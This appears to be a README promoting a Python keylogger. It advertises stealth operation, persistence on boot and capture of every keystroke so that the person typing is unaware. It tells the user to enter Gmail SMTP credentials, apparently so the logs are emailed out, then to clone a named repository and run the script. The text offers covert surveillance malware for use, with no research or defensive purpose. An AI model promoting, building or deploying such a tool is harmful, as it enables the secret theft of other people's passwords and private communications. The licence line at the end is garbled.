This project is a simple yet powerful keylogger implemented in python. A keylogger also known as keystroke logging or keyboard capturing is the action of recording (logging) the keys struck on a keyboard typically in a covert manner so that the person using the keyboard is unaware that their actions are being monitored. This keylogger captures keystrokes from the user's keyboard input providing a comprehensive record of all the keys pressed.
- Put your email gmail here
sender_mail="youremail"
in line: 22 - Also in this
recv_mail="youremail"
in line: 23 - Put the password smtp gmail:
sender_password = "apppassword"
in line: 24 ||this how to do it
Here're some of the project's best features:
- Stealth Mode: The keylogger operates silently in the background without the user's knowledge
- Keystroke Logging: Captures all keyboard inputs including special keys function keys and alphanumeric characters
- Persistence: Automatically starts capturing keystrokes upon system boot
- Log File Generation: Stores captured keystrokes in a log file for later analysis
- Customization: Easily customizable codebase to tailor the keylogger according to specific requirements
1. Clone it:
git clone https://github.com/xcyberspy/keylogger.git
2. Run it
python key.py
Technologies used in the project:
- Vscode editor
- Python
This project is licensed under the This project is licensed under the [xcyberspy]